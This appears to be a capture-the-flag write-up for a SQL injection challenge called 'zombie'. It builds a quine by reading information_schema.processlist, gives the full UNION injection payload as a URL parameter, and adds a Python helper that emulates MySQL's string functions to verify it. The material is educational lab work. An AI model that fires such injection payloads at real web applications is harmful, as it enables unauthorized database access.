zombie

We are provided with the SQL query:

SELECT pw FROM prob_zombie WHERE pw='{$_GET[pw]}'

Similar to [ouroboros], this challenge has to be solved with a Quine (a query whose output is its own input). However, since the string ace is filtered out, we have to find another way of crafting our Quine.

information_schema.processlist table

As noted in the MySQL documentation, the information_schema.processlist table is one source of process information: it shows the operations currently being performed by the set of threads executing within the server.

info column

Within this table, the info column contains the statement that is currently being executed, as shown below.

SELECT info FROM information_schema.processlist

Since the above query is being executed, the value present in the info column of information_schema.processlist would be:

+-------------------------------------------------+
| info                                            |
+-------------------------------------------------+
| SELECT info FROM information_schema.processlist |
+-------------------------------------------------+

As we can see, the SQL query outputs itself, thus acting as a Quine.


Modified Quine

1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist %23
  • substr(info,locate('1',info),length(info)-locate('1',info)):
    • locate('1', info) finds the 1-based position of the first occurrence of the character '1' in the info column. Since the query text before our input contains no '1', this is the position of the '1' at the start of our payload.
    • length(info) gives the total length of the info column's content.
    • length(info)-locate('1',info) is the length of the substring starting at that '1' and stopping one character short of the end. The character dropped is the closing quote ' that the server's query template appends after our input, so only our own text remains.
    • substr(info, locate('1', info), length(info) - locate('1', info)) extracts this substring.
  • FROM information_schema.processlist:
    • This specifies the table from which the data is being selected. The information_schema.processlist table contains information about the currently running processes in the MySQL database server, including the text of our own query.

If we provide the following URI parameter:

?pw=1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist %23

The resultant query becomes:

SELECT pw FROM prob_zombie WHERE pw='1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist #'
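To check the arithmetic without a database, here is an added example (not part of the original write-up) that emulates MySQL's 1-based LOCATE/LENGTH/SUBSTR semantics, substitutes a pw value into the challenge's query template, and tests whether the row the injected SELECT would echo back equals the parameter. It models only the echo from processlist.info; the template string and the marker character '1' are taken from the write-up.

```python
# Added model of the processlist Quine; no database is contacted.
QUERY_TEMPLATE = "SELECT pw FROM prob_zombie WHERE pw='{pw}'"  # from the challenge


def mysql_locate(needle: str, haystack: str) -> int:
    """LOCATE(substr, str): 1-based position of the first match, 0 if absent."""
    return haystack.find(needle) + 1


def mysql_substr(s: str, pos: int, length: int) -> str:
    """SUBSTR(str, pos, len) with MySQL semantics: 1-based, pos 0 yields ''."""
    if pos == 0 or length <= 0:
        return ""
    if pos < 0:
        pos = len(s) + pos + 1  # a negative pos counts from the end
        if pos <= 0:
            return ""
    return s[pos - 1 : pos - 1 + length]


def quine_output(pw: str, marker: str = "1") -> str:
    """What the injected SELECT yields for a given pw parameter.

    processlist.info holds the statement exactly as the server received it:
    the template with pw substituted, trailing quote included. Taking
    substr(info, locate(marker,info), length(info)-locate(marker,info))
    keeps everything from the marker up to, but not including, the last
    character, i.e. it strips the quote that closed the string literal.
    """
    info = QUERY_TEMPLATE.format(pw=pw)
    start = mysql_locate(marker, info)
    return mysql_substr(info, start, len(info) - start)


def is_quine(pw: str) -> bool:
    """True when the echoed row equals the parameter ($result['pw'] === $_GET['pw'])."""
    return quine_output(pw) == pw


# The write-up's payload after URL decoding (%23 -> #).
PAYLOAD = ("1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) "
           "FROM information_schema.processlist #")

if __name__ == "__main__":
    print(quine_output(PAYLOAD))
    print("quine:", is_quine(PAYLOAD))
```

A parameter that contains no '1' makes LOCATE return 0, and SUBSTR with position 0 returns the empty string, so the marker character must be one the template itself does not contain.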
